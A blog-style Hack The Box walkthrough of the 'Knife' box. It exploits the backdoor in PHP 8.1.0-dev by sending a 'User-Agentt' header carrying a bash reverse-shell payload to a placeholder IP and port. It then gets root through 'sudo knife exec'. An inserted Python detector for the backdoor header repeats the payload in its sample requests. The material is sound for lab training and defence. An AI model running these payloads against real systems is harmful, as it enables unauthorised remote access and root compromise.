Knife HTB Walkthrough

Hey guys, Styx here. Back after a break. It's time to get back at it. This time I have an HTB walkthrough of the Knife box. Let's get into it.

## RECON ## 

Before we do anything, let's add the IP to our /etc/hosts file.

Now let's kick off our recon. 

Rustscan shows 2 ports open: port 22, which is SSH, and port 80, which is HTTP.

Well, let's look at what technology is running on the server. Using the Wappalyzer plugin, we see that this web app is running on PHP 8.1.0. Let's give it a quick Google, and we quickly find this exploit HERE

Blog about this cool find over here -->HERE 

An early release of PHP, the PHP 8.1.0-dev version, was released with a backdoor on March 28th 2021, but the backdoor was quickly discovered and removed. If this version of PHP runs on a server, an attacker can execute arbitrary code by sending the User-Agentt header (note the doubled "t", which distinguishes it from the normal User-Agent header).
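A defender-side check for the backdoor described above, as an added example that is not from the original post or from the PHP project: it scans raw HTTP/1.x requests for the misspelled `User-Agentt` header and separates requests carrying the `zerodium` marker used in this walkthrough's payload from ones that merely send the header. The sample requests, the host name `app.example` and all function names are constructed for illustration.

```python
BACKDOOR_HEADER = "user-agentt"   # misspelled header the backdoored build reads
MARKER = "zerodium"               # marker string seen in the walkthrough payload

# Constructed sample requests (not captured traffic); app.example is a placeholder.
SAMPLE_REQUESTS = [
    b"GET / HTTP/1.1\r\nHost: app.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: app.example\r\nUser-Agentt: zerodiumsystem("
    b"\"/bin/bash -c 'bash -i >&/dev/tcp/IP/PORT 0>&1'\");\r\n\r\n",
    b"GET / HTTP/1.1\r\nHost: app.example\r\nuser-agentt:  probe\r\n\r\n",
    b"GET /?q=User-Agentt HTTP/1.1\r\nHost: app.example\r\nUser-Agent: curl/8.0\r\n\r\n",
]


def parse_headers(raw: bytes):
    """Return (name, value) pairs from the header block of one raw HTTP/1.x request."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    pairs = []
    for line in head.split("\r\n")[1:]:          # [1:] skips the request line
        if ":" in line:
            name, value = line.split(":", 1)
            # Header names are case-insensitive; '_' is folded to '-' as a
            # conservative assumption about CGI-style variable mapping.
            pairs.append((name.strip().lower().replace("_", "-"), value.strip()))
    return pairs


def classify(raw: bytes) -> str:
    """Return 'backdoor-trigger', 'suspicious-header' or 'clean' for one request."""
    verdict = "clean"
    for name, value in parse_headers(raw):
        if name != BACKDOOR_HEADER:
            continue
        if MARKER in value:
            return "backdoor-trigger"            # header plus marker: code-execution attempt
        verdict = "suspicious-header"            # no legitimate client sends this header
    return verdict


def scan(requests):
    """Return (index, verdict) for every request that is not clean."""
    results = [(i, classify(r)) for i, r in enumerate(requests)]
    return [(i, v) for i, v in results if v != "clean"]


if __name__ == "__main__":
    for index, verdict in scan(SAMPLE_REQUESTS):
        print(f"request {index}: {verdict}")
```

Default web server access logs usually record only the standard User-Agent value, so a check like this needs full request headers from a reverse proxy, WAF or packet capture.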

## Initial Foothold ## 

Now that we have found a good lead, let's try to gain our initial foothold. If you've read the article and looked at the exploit over at exploit-db, let's exploit this backdoor by adding the following header to the GET request.

User-Agentt: zerodiumsystem("/bin/bash -c 'bash -i >&/dev/tcp/IP/PORT 0>&1'"); 

 


As you can see in the picture above, we are in! Looking at our user, we see that we are James. Let's head over to his home directory to see if he has some useful info there. And there's the User.txt!

## Privilege escalation ## 

Let's perform some local enumeration to see if we can find a good privilege escalation vector in order to root this box. One of the first things I do in this phase is to run the sudo -l command to see whether this user is allowed to use sudo.

Well, look at that! We can run sudo /usr/bin/knife. After inspecting the knife binary, we can gain a root shell by running:

sudo knife exec --exec "exec '/bin/sh -i' "

 

And we rooted the box!

Hope this walkthrough was useful to you. See you in the next one!
